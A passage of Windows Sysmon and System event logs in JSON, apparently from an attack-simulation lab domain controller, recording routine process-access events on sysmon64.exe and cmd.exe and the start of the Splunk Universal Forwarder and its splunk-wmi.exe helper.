TEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.344\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.344","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76820,"ProcessID":856,"ThreadID":1272,"Channel":"System","Message":"The SplunkForwarder service entered the running state.","param1":"SplunkForwarder","param2":"running","EventReceivedTime":"2020-08-01 05:46:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.272\r\nProcessGuid: {A837DB8D-01CC-5F25-0000-001055120400}\r\nProcessId: 3756\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.272","ProcessGuid":"{A837DB8D-01CC-5F25-0000-001055120400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 